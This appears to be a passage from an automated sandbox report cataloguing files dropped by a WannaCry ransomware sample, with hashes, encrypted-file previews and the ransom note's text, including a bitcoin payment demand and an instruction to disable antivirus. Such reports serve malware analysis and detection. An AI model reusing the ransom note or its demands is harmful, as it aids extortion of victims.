                                SHA-256:BE43591B82200A59241AD41176FD8EF4A537F2DD1F11197DD6AD31AEC9A4C755
                                SHA-512:C77AFABED28C9ACB7177D4C427AD0694FE141CBF89E4E1F33D3B89C74902A920DBA60E94246AAC7EEF20BC2CC4610A42A9ED1685B812CA85B89F530CA41CC48C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......Q.).*s-....<..o.J..%.L.#.0...\....3p.....nT^.J|..)@.....C..h.]j._...p\......+_..3U'.&......}7B..m].W.. bn*..gm.A.Y.,.....;.".?./....@.RPd[...6..%...._...v;...~2E......1...#...nqDj3.k........r. .........V.9..F....A..i09.N$~...d'$$..#........:........rH.......\k..O...r....z6Y.b!....f-.A>.....W..?..K..fb-.3.H.7..P.....VR...2c\.E].~.B.Cc.N..sF&.rW<....;.elY....f..t......1.....D?.hB....%..3..m...:....+y./.T..... .mx..O..g..>.t.......V..!.{$nj..3.!...]..C.....[..^..n.83.w....EJ...z.z..m..H=Wj..)..dV..%X#O.xP..n..J.Ix1( `.k.v.f.....4...g..\..M,V........

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16664
                                Entropy (8bit):7.987456972046725
                                Encrypted:false
                                SSDEEP:384:gzJMl2QSBwEKLJWtuduyuiau8htrTs4lmpoSdZjoHDBjtXR:r8QSBwZMyuiD8htA4lmrdaHXR
                                MD5:FCD1CBABDD7DF98168CE175F6B136150
                                SHA1:6F9BFB8D7B0F37C3B9A15098DF9F2359A2A0C42D
                                SHA-256:27E3EC867506F37B95BDC42D0C7985C8361027E55DB3A2C17E3831B1A685C5DA
                                SHA-512:80CD736117DA09A6AF49750D0EF1BBC48264D8E8A67C2C93281D5AD9CD0B182025B8FA530E2114FFD590A5F7F658F7A42960D7D2EB6E09B1414E09B842AF68D8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......Oq..<*j..N.E..I.!c..DT.#.u,.r..v..h.%j|.....].".I...*N...>...P..M....y[.....!.R.H..s.....RS....gE..=.u........./8...v..AsPPIOIE...K8.]P.b...#..+"..9..}^..[w1.>.\...i.c.=Sy....I....C:jF....j......`.tB...u..._..3....K_.........Z.n..!.......@......l0....b)..^a.b...|.".....#.......F#D..c.X..uN./.b.p@..9.vVX..k.O..<...../...ed.....c).F.r.Y.?,.>.,...w...&..2...~h......_..W.olk-.{.........|...c..s.0..|.**.].vOfO.8@.;V..f..z..+v.(....&..B.J...{.M...R....T.j..e~pb.*`..6....*9........B.....|v....*.....K..o.......1..'. 6f..c.g.Td.Rl.......D.2**=n..u.9.....E..!...u..Uq.a.T...#.........../...w......&=2...(.....E.....~.PQ..k..Y.....9....F..vSO.......<.D.=..GGf%....j..s......V...n.I]..x...*........Ln.|`......S.l.....|.B..o.\]...;U........k...U...O....Us'{_.,.A..c....+c.).e..G...y.....A./.5.8W.$Sb..6..$.L...._.....A.!..O.,.)H.'N....=..w..;..;..6....s..F....A....Z.[.G.R.X+T..........U&..h..~.6V...8..........@..L.`7@C.....

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45336
                                Entropy (8bit):7.996355135175605
                                Encrypted:true
                                SSDEEP:768:AsGZ9NYOan+iJi6ljzNmHSVLObjy6cKiU/Ek4bY9rX3OP+rna3dCmTg6D5McmP1U:AsGZ/YPhdBUHS5OPyoCBbWrX3O+KdCm3
                                MD5:421BEF3E923E7A38FB659F1AB263B467
                                SHA1:A781315E5E5C535024E57EA92CAB2E5D9B34990D
                                SHA-256:9DC08738ECD1EDAB97EB3160D12E2E8359384B82CD10C14521B7B7229B75116E
                                SHA-512:0CC784F721D5A1ACB70EDBE17035F91157B4EFB3E80896B7B4F5789D29CB443AE33AAD7B1ADAE8E6EE0CB51E217772A1D1BDC173AC5415DF8D4CC0B0EC3944FF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....6q\.{.8.U/:.nzz..V?..cX.K..B[.eK.Wl...G.~..zY.^.2I:c...E..).h.<.&6.~...+..t.W.._.......T....<.........3.....{.].s.,.....\..`Z..t....L.....M.....-..=.<..q......)...s..&{.+$...n....jG)..OC..6mkU.KS.zL<..=..g\q._!-...G.v.:.q o)\...#....T..H.7.............px1K.$....%.%.)_i..!:.?..........=H....{G...a.<.t..:...$....ww.."x.lz%".}.7.xQ.....?r..tE..O.CE.(.......K.. !B.....Gy.<,.G.........8..&..q.^..6...V.I...g.........V.;.~F...G...w\2.` I.)3...3T.....pM......O...xq.ju...`......./....V...4>.D..`qji~.\....~.k@.I..f..G-..O.^...F..j..##.;...-v{....ck.....a|.......r..B..3'./.$.gW..3c.e4......\y.....gE'xSCs$.-.......9.P.Q...{....Gx.%Eo~=.Lm..i.m...?...2....sQ..f..gp|Tf^...&d...Gh..PS...x^#.V...%.+......{..>..S.y.z.|/...T..[~x..{..}.3 .d.#.:..(..........;.H.t...TA....>.....-....ut[.{.ne../.bF...EJ....E..G../5.....&..lD.?.uf../..6.&..=.r..-l?...|b.....7:G.Q4..`....aa.!..q........X7....DT..f.......V....... .h.....Fe.{o4.\..M.O(....aI...j

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6776
                                Entropy (8bit):7.9709294835018785
                                Encrypted:false
                                SSDEEP:96:oROgSvKdpJQDO8lqeXF4Ah5oR1qhHbxuR8hic9fowl5qOQ0HeosmZkXxJv5NVcxZ:cw15Q1qhHVXhowluZmZkXjxvcxJP
                                MD5:D028491DBED54475182B9E77C0F10242
                                SHA1:D77A56615AD9D633B6A1D4740100E600050F2EC5
                                SHA-256:C21400DB17DFDD8612FDB7786A17102B04F67428A21703910F1C9E6E5E1A2B04
                                SHA-512:B9D8FEADE69F260BF5C355685116EA0D512D4337BFB081E367DE2695443A5B7AC2A29CAA925E51697926C51FD6876E781565B9FD2276D4CC474372C4017EB39D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........+..\A.e...n.R....0...M...@........I......^O.rt..M..1."..W....%..zVL.E.. ...2<.V.....\.[..!u...Q".A...I.].t....s..9../.^....~2.}+.._I'.[..y.#.c......u..{4'..u*3LCM...0lD........X75un.8.`.4/hL.._.G.y..s..V.i.8Y.....cpk.(.....B.V#...3rYE.@....N.......`..........@.RA._.\........A.&......:..(.=PJ..)..%.....E.\=...k.......%.I.mE...'s.-...[>......N..xZ.-...t.......jw.)...*.N`H.0.s..{.E.Ie....C..#.e)..Hz..YG..>?...._FDvG.....p#.>.m.tG.t.N.7._%....V..S.Rh'Y...H.:$....o.J..!...X..-.].u"dI.....Q..6..Z.3.)y,....[..g]:..t...>o#`/@..etB1.@.KH..V.'.......*..I..p_.H"#.............0..h......nX..,{..ow.xL=........D...Ax....(..v.Y<.....n.Kp.'.@#....+.1\s..I.%so..h.E..._7?..g..BWT53K-.. ;...[.:.....8...f..e.....k...D.....C.s#.N.P.5....I-.w...0.L..3..B.Y.P.1..P..EU#b3..+s.J~.k.........D.N.W=:..S.8......n.........gnq.sN......e.......,8[.3.".`.i...s.......F.O.....$.`.N........$.J.OX.f............S2.%.^...'.d..]..h.=.....U.$*..u..5D..1..[.....L.

                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4664
                                Entropy (8bit):7.960784159131869
                                Encrypted:false
                                SSDEEP:96:oA8r8pCRpMqDCMU1CHRccjdZraJriCESoG4LZE/mX6xoVIGn9sSx8:WruCgG40cwbG4CEQ4LimXR9u
                                MD5:D8DD3B60700B22DDAA57FAE8BE94CDD7
                                SHA1:35E8549507C92C920BA0C99D62BBE4FA25E93EBE
                                SHA-256:D0408C9D1318C5817CA57E83007534975C6EF8123F41A45F669CC18822EC8AAB
                                SHA-512:933A8FE1E3C816CADB2E8EE101181EE812626DC30294E8849F1A79D7626B1EBFDC97DC36EC0F445E04B3DCAA7790A9FB6D5167248525483582D8E404488CF290
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......y...5K."..N..m.[t.....k..o.>.D+....'...)...}g2.s..\....\C.c...Z...@..q......k3.[....j.*Pn..g.&@U.....M..?.[......a..../.......Y...b*&..c4.l..e..C......:. *g...}t...(.......a5*.~.)fS......;=d"}pn.:.*.p5...$.3x!vYH.go.....f....:...z....-...k............)....[.....E..6~.g.(-f`..&..]a<...P"..]liN.6.)XW........:.g;w".......F......b[$_2.pJ9.Y.../U6.b..........0...|.....C....Y.e........R..2{H..M5.I....{.<...pn!.2Mo2.6..5Y........Cl................*..7.F....R5...z.....".L....o...+......e..D.".rooo.a..Wl.,3...:..[Y......6.i.(I...n.....wO.).G|._.Y..'p.Wr^:....`.0Ds.|?...L.J.r.q9..F_.......7..e0gRq....O$...E.G.R...._\V0......!u~.......`.d...f^..p.%/..)......N...Q...:M..l..2..s.....ZU.0v..Vj&.1@..D.U...dL.!....?.j.({....p.....2.^..<.t.,..r..R.?..........\F`....\$.y.KC-CH....-......&.&wT[.. ...:.Rs.......g..95.+......I.h[<.....$..P....~F..Uh.I.Zq.8..#O..nZ...P.4.R8?.%].t.@.]9=...@.I%o..y...../..U\..w.4.B\J_....[H3.S.#8."...

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{038DC840-BEFD-4EDF-A537-D206F96DC1A1}mt11414620.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8616
                                Entropy (8bit):7.978767563831868
                                Encrypted:false
                                SSDEEP:192:RiLcbuiA/u9/E7+05CmnYKd/CC33DXmLJFK1vU07WEiiwu8/l:RZuiA/uxE7+8BvzWLu1b7eiwHN
                                MD5:745B3627570D33A23D0C594021841AC3
                                SHA1:D9A8BF2927786126176004720B988355250728AA
                                SHA-256:F54BFB883ACE202C7C50E01B963A1FA578843FE2B5C243E5CDEE1154938A6C7D
                                SHA-512:B2312216C225F64582156F53EDE143DA3300E273216277A5D5A3501E3A60AF61057773052C94A5FD28553CC3C5AB869D9E1374859F72409753B9072F04DCCA6B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..... ......A..>.....<..._.z2.}h..s..(.k</...Z..)...G...S7....\.L...."..h.W.]..:.......+"h1......#1.......`L.'.x...D......9.Z_.H.I....T.Yg.4.]...\qQ. M._..2.....si...x.F...>...M....t.K0......~..{P........26z.-u...L.4m.)..~.2...MF.c/.....2W..L...2[..c...... .......=d*.Q.He..^......w<.*.....f..g.m!.L.....E...i.H............Fb..Wv.x...o.1a?..VG..#.QX..!.~..............wg....;x...f.<.F..Ou..e.h.8h8m.o......./.V......ql.<.e"B.",.?..d...y.h.....bYm.CB..4..=.9..N..}.A...,].J.;:A...J.T$......}..G....8...ir.4.n.N..0.HW....L..fIMw1P_...F.s!....Sm2r..Ltj?]....6&H..sj..b.BGd..x(Q....s......$FQ...4m........y........E.N..{P...'.J...P..qR3.>.~.x.+FP.!.B.k.I:.*C.13.S.y.ru....<..)[OT....n[4..S..5\.BEA.s7.O...;.|*O....m...c...EU...W..E..S.)i...$.....+.E.z........h...D..*r....%^..J....0...DY_..N}I;EJ.I....u.m...^.......Q..y...[H..c.......ku.../...L..y.g...#..pR`..._ ."z.....g.$...X.P'4..[!...F..,.i..W.PbR..=..pR.{&.....T...M.elP........4?....D./TLg.{O.

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{2C3729F5-6B1A-4F06-B77C-2AB41C959EB6}mt11829122.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14408
                                Entropy (8bit):7.988128531880831
                                Encrypted:false
                                SSDEEP:384:vCCZE7ORx/7UCw3OL9iv4dfiKXZSxaGH87:vCCRRhb8vikHK
                                MD5:5E9508A839979A4A7B3E2FCD5A2849D3
                                SHA1:2104DED8C5505AA5A5BA6C63D08968288D90ADB4
                                SHA-256:E12F6A9D225C47189CF1D260E20446E938219C8E01B793BB8A15981A265DD400
                                SHA-512:F9B7F1F18C96BCA04158B413BCE4A9A3F2357A6DB7CE39E612E475182F706E6F8131008488196E1F45320384CCA25D595F9FFF44D47F5B5200C2AC9C5730F75A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....&#.=V.z.a|.....`.8.R.a.../`..~._B{.....h..T......?..rlx.....~.T_.!...~,....n...G...bz.......W.\<Z>..T.Zzp...$e .'........].....j...h........t.!&N....Rd....."=.g...,Do..Df0.....dEo.?\.d.t.p..(..k2..k.='."....|t..h..<.h.jR....~S..V.L.#0.<..P..P....+7...........FL.j.....N-=..v.L...,k'.k...b......o....[=.H.#x!F.M..;.C.q...t`..$...L%..........;..,.H.......3....).a.m...W..M")..]..'....&].....Ba.~......^..xI.Y.x0u7.....v..a.JW.<."..C..|t..|.,..(....BoN.G.<F....Nx..5.=..L..`..*q5.^+.+!u..P...[~.(...J<K....d.4H....T...(W..cS%e.)y.3...c.............v.v....~<..-2M'.\F...Y.Mse&.o:.dF0b43...:......A.@L...."....L.O.wcV.nAiD3K,.1.......U.H..}...%.D.....Bvke..q..o..50...i.w.vk.y...Q..F......uo.p.O..}M.=o...d.g...+.._($....6......;'j.......-.Vm...z.0.f.,s.....D.Z?%....-.T.|.aeteB..o$q.:/.1.................&.s.).~.Yjn.I...ch-..DX..+..o.Y:...[m.V...pL[n.W..9...S..X..,...F..u.B......n..0....p.&Txx.k.....7C..Z.%.@......<.......?..F.3.........~..

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{8E108E7E-651B-4D15-9446-304CDAAB8AF9}mt10000137.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5240
                                Entropy (8bit):7.963769984531869
                                Encrypted:false
                                SSDEEP:96:o2IGDuQyXUSa+GfDKGnu6JSmV7OPe1fv3vHF4V2HHW7c/GasCys1ve:ZRNyXUf+GfDKGnBEmVqW1fl4V2/vsC38
                                MD5:C62B978E4D32CCF1AFCE3F130111770F
                                SHA1:3C5A24B14A30A8E9643DF9387B29CC9823EA7879
                                SHA-256:F44ECBB8A86A1B842DB6D1C41E24685C635BFF1524738A3CC242D1A81EC4533E
                                SHA-512:B5312D531A65CFE14F2413A3AE841A5BC47122DFB07F4AF9C168DFB79EBB55D6BE638963845C11A9046272008D3DB98838BCB3E292F86F8D95BA18E4D7CC747D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......nD.....$~..BY.....x.b..c7.m/.i]}.#.k....PH.b...Tz.s.!..*A.......e.9...;..."A...!...g..,4.:l.i.%{...N.&../..V..t....w.S(p.I.r..~.\l.m.....e.2Eu..M]...6,Qm ....`..oa.."^J.XaB..'f..m..h\...UHC_..S...<.A.....=G6.g?,..j...B6zE..V.e..0.|;...x...2....._.........3......{..}.......@.T..K....9..q........l.\.s.2]RB.z..i.K..S...}...=?7\6S....l|yRRO,.8.~z.4.B).N0".j.u...B..#.?d..M.}.E!...f...z.y.....T..[.t.u).P.Y.....%...o:Pf.p ....K./....Y..3..U...).F...\.Ez...M..\.0.A.k..9.{9...Ko.Y..RmRm.j..i.....k.3....8.......t...gu.];.\k.0...,I..x...p:.|...eS~..:...ry......j.8....#....:...\)n..p.'.I..m.WO.0.9|......Ow5~.r....QpK.......9xT.u..t. ...V../...q....~.|&.3...Wr.J0...-..ou.0....Z%....d..^.YU.....C-...._.}..+B......S.d....Py..c.....Ri....\}.`.......t.....p..A.)..;...T..*...S.ml....0.,.U...~.J..7..Q.C..ZpM...&.6 .I...0.=........0.,4..L*! .>}.4.@...A.............J.....o....F..L...]B.h.....:..a........E.}......s...#...@..~.1T.B.s..%...

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{920EC2BC-61C3-40DF-86C2-1E647F210A9F}mt16400647.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7384
                                Entropy (8bit):7.971346909816599
                                Encrypted:false
                                SSDEEP:192:TEjhp5acTSCVuWk2SML1UeHKdhjYl4VIBthlfe/FxFlA:0O0uWk2PKdhfipNeplA
                                MD5:0FA5C6A275CEFF29D004C61DDF9CDAE5
                                SHA1:95AEB4CEEE2E7609CE9FB12CE96EF8443702AA99
                                SHA-256:A103B671A2DCE9B51426DDAB76819600FF31F400DCAF1EEB9B06C8262740AC6F
                                SHA-512:96ED5037573D8A89465F12102B4A8B6C6249614D523471D00695B27BFD78DF2F6C859076D0CA4EE50E0C442689AE5C4BB8FC61BD1FA074882FDFC609A9840193
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....H.S.s...]._. xV_..MI4bo...|..m...u8..U...>..sj...|(n..U.kyu....*...k.X6.\...,.....,B.\...j..b..)..<....~.X...p.. ...x..&0..Ogd...G...M.../G1.F ...o...8....@...*~...@...2'..]..o...SQ.he..(Iq../.{.=.R...8V.q..n....%.N...s.~..{h.s6...G.R[A43.N..............A.....I.-45.ZZ.x.....U.s..XUz..K...._.b.n$.@.gq.G....S^U(V.=.....6.t.8.......J....z..=..(.i..kf....x.z.A.2..8..vEU..)xq..S0.F...4.Sj>.....t.lU.Ck..../FG.......u...-.K.....g....k.)..P..<.umG.....n9&3............,.b.W.'URC....F....x....R*7.p...OJ~t.Y..*......S.</qX...... ^GrY.....F.g.h.6...QD..@.=...X.....2...td.....{.<.Q)J.IH.X.7%...yx.0.AD2.P. 2.K.`...S....Rc..4..o_.=.l..c.n.....Lc.Y....Fi.c...V-.On.....},....g.B-..+.&.....x.8J.G...V..p...6......(.:..e.EI_.1..!.d.M.%..f..s.3......;.Y...*:.q..W./........5..[6G."-g.....;A.[q..>..4..g..M..(.z.:a....g..~..#..r..FDSx;k..B..-e.{.....B.....^b...j.^;.a..........c...@.Er...F1'.`...H...i..U..q...o[l.xu...vu.5..r..S..my."b...^.D.XV.r.[y.B

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{A26B3E48-AE08-4429-A0F3-46650603BDAD}mt67739505.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9032
                                Entropy (8bit):7.979038002619097
                                Encrypted:false
                                SSDEEP:192:YgX4Y0Nvi60zg7awlLX4XXwuboe7YvPzODtbn/ECLKyZGTH33du:BX4YIKjaawN4Qubo/vbODxn/JLlUZu
                                MD5:778500D858A554C861F4B5F4F35EE443
                                SHA1:17B3C75E1CDB6439C800A0625DEB044B81E3C145
                                SHA-256:E69EFBFE94D45C4FA18A77D33BE8ABD90DB7CBF1AED2A371405538F88D60FAD0
                                SHA-512:F90750EB6B60F630C300CCD31CCFAF67E64FACA8B715C4511D1723F533924656F8FF52594602F8CE736B32E10598DA76F3A3CB87C3CBD60D40C25F2534542204
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....r..7Q..X.W.'.:2G..[H2..T.m ..RK.\J.R.S...RV._=........3..s...3,..}$...H4.0...V GG...i.e..73.<uJ.]...1..Y.._.c.....&=..r.......C..s,.h.G.....e.*.......D> ~..k3...$..+..V&...W,.G.6,...l.bC.1Y......-.u.7}FX2~.*.AU..,.~.]./...P%....(.*..]s.::.u..G.E.}.....*".......[^.V.h+....Pogg....Nr..]Q...'bg..B./n...*~.[.pz!.H...Xg..xA...V...2A<.1X.}.L<...L....;b.M....t.g.....OH..4.K..O..V@a.@....c.zK......?..q...p..yr}..F.'..SZ..S.$.....d....D.....j....o........x.T..1..).......;..v..&....y...4m..f ..S."......&..F....bMa....4n..7D."%.-..ah3.....j.c=6.kd...+..q..`JN.{L...~.U2.v.]......\.ME.!-..y....U.N.....s.M..>..x..."~....r\GB...M..[.T.^h5".+.....Mx...w.M.2....J..z`z.-.T...x........!.4*.`(..7T.....>F...^..zY.........m.3}....7yG.p.M.......6..11.X..*.W.v..l..-..4........\*.b......#.>1S._.[.N...t...D4.J.l.\..&......i?.N.......d.<..-0S-.U..!...G.....m ...ba.qo9...Cz.$.m`c.B&B.x:..W.......Q.......dg...R......wz\...`b..8........$...D....1`...?....Q..

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{B1076C7E-1A13-46D9-84EB-4CAAC5C83618}mt66963475.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7960
                                Entropy (8bit):7.973498783171707
                                Encrypted:false
                                SSDEEP:192:pA/iZxS3YHs5MBwViHTdf/KQOkrADsgoUnm:pxSSsHVExf/KQOkrADsinm
                                MD5:E0D55C9E2C64E307F1C208C1FF0813F0
                                SHA1:DDCB28E44F077AB5D50E1E15DC53F92DFE9797B8
                                SHA-256:38F14DA4C30350A91B84367D4EB4D8E8C4C9431B3832574893083132FDC826C2
                                SHA-512:27C335C77C1178C11706AD14D5C696813D5698A10AC08DFBE5F061F2DC7345864BC2BA8781C3B7A6D8452046712B23853BBD4568A649BAE132B93ACE88A81C2D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....l6.A?.g.vc.4...... .......^.[+.....jJ..#e.k.BC'".9V^6.....}..)W?.[6...Y+..=nh.......,g.m....G...J.......Z.I'.]Zc u......0.....P...y....+...9N....w&..iE.x....P...4....s"&4e..g+!..j2k....F).}<...T.E..OJOoo>...K.+*?....tr....`...TBB.......C.Q..a.............af...4.Mk...[.C.>X3.m.P.l.B.Z.b.Hy..0D.......7:u.....3?z.M..f:rqJ.. 0.D.K..cH.].L.U.....a9Sq..>./..q..O.RI..y.Li<.............bS....W.E..E..<./Mf.`..0OKe..*...f.6.HT..........z....x....+..7u.WZ.k.r=.~..p@..3...g..<...I.'R._.O..9..0.Is...*C.x{.......]... .zy"*.q...a.s)z.....b...zL...;%..g+Et.aae....bA..n.A.r....X.......$..ik...t.....k...o..2..+3......)........6..[.6.HYm.#0...j.KgB.3.q....5zy.'........!....?.IW..o..ee..Y2...\.....}.l.............Rn.......J..4W./...~.... ..*.k-...=.e..y..L. ..^Q..D.p..hb!$..5..h.P...7.....c..VB.S.VTS..I.&G4.G......%.2........z1@H.....$.kLW3AD....).......@S.3../...v=-.....[..).B....z.I.Y8P...vB5...).~DY.J._."Y._..Vn.....8.o....4[...[z.h.~....\

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{C5106F55-DE69-4257-BD69-461E3E514242}mt16400656.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7032
                                Entropy (8bit):7.972004524057607
                                Encrypted:false
                                SSDEEP:192:x6QwvzaSpCgIwkne9aG9HTd+56AtETV3j:x6dzaZgD2eBHT0S5j
                                MD5:8FF0367DE3940B774EA7124CBC222AE0
                                SHA1:3BF79205E0562E8D4292602A453E5CEDC31C062F
                                SHA-256:387478F332A51A3F029EDB7604CCF15A72E2261C6E2A4DF8743A4FA8DCF836D8
                                SHA-512:C247C38C0B059A50281A2254E3D29DAD74A70438EC65D03255F84C116A95DF22818B74F1A912E779A9FD7E89C9821065ECE6F4CB903679A2F047636DC8946746
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....8H....}55.p..G(..Y.8Q..NG`u...e.....>h....+..7.. t. o....q/..Af..U.P..b..=..g.......Y..6.+...... .....1..kF|..4_..65.....\{X...M..D.)....^...(.@..O....h6(W.%VY($.{\7..6.......+.S.M.L.1...^J.Q.........`...Mn;.s....=,...i.....f..n...V&C..KY....T.........r...w....0..f...|..Gp=.*...V.....#..V..g...R.2.........4"..@z.....q.w.....&J7!C.....N......o.2..Su..a....M..}{...)=G.1e..."...:`p..&i..K,.*.XW...e=.. ..&.`R..9..n......)AG.m8....m:..j.w.....|.,Y..V...B.z....M6q.Q...A.......oXr.a...y...[.....i..J.{..?..B..D.[4.]!.......|...m....QC.n.w"..ES.*......p/p....a............~....X.d...Y.+L..oJ...e.FJG..T..........At.W-~....S...Q."..7?a......TBP@..x.y~y...s:E...}..A....^..S.H}.O..A......m.]e..'.b......lH....a..'."..:Q##~.*4......UR/.&......+.... 7Cp...Sd(.o.C.\..s..R..N.2%...j;}...`._..v....c.Y.5......]S..F...(..T....,u......o..Z..&........r./..;)......k.b.-jc..JVr..P^uf..7Y.i....U..._k..sA.+%v-...A6{+|...wC2..[........Jg.

                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{EBE7A16E-2C11-4DC5-89A4-976E33A0596A}mt45299826.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8792
                                Entropy (8bit):7.979271345467522
                                Encrypted:false
                                SSDEEP:192:dVKLWAQ14S41n4b+G+lX8UfcmsoS0SgqZ4WTMg4i9JBx23J4t:dkleJ41n4b+ZMUfcDo2gq+WIg4i7BI3k
                                MD5:672AB49AEA1E3B4A75C0E7F684B00F2C
                                SHA1:A07E299FBDB73A7A0FDA6B07652A9BC54C3BD592
                                SHA-256:E4100418E711CEB0C3ECCF6F8D19D3343E8776C87B3B973B3846BA83D8CF37F1
                                SHA-512:89F6245B880DEA865AE6A63F5604161383144E76BE1E82ED8206D98128566B4DC888F3D90C1768E1FA3BB9854CAB7D11E816E89DE8BD4AE477766E4E478F9FD2
                                Malicious:false
                                Reputation:unknown
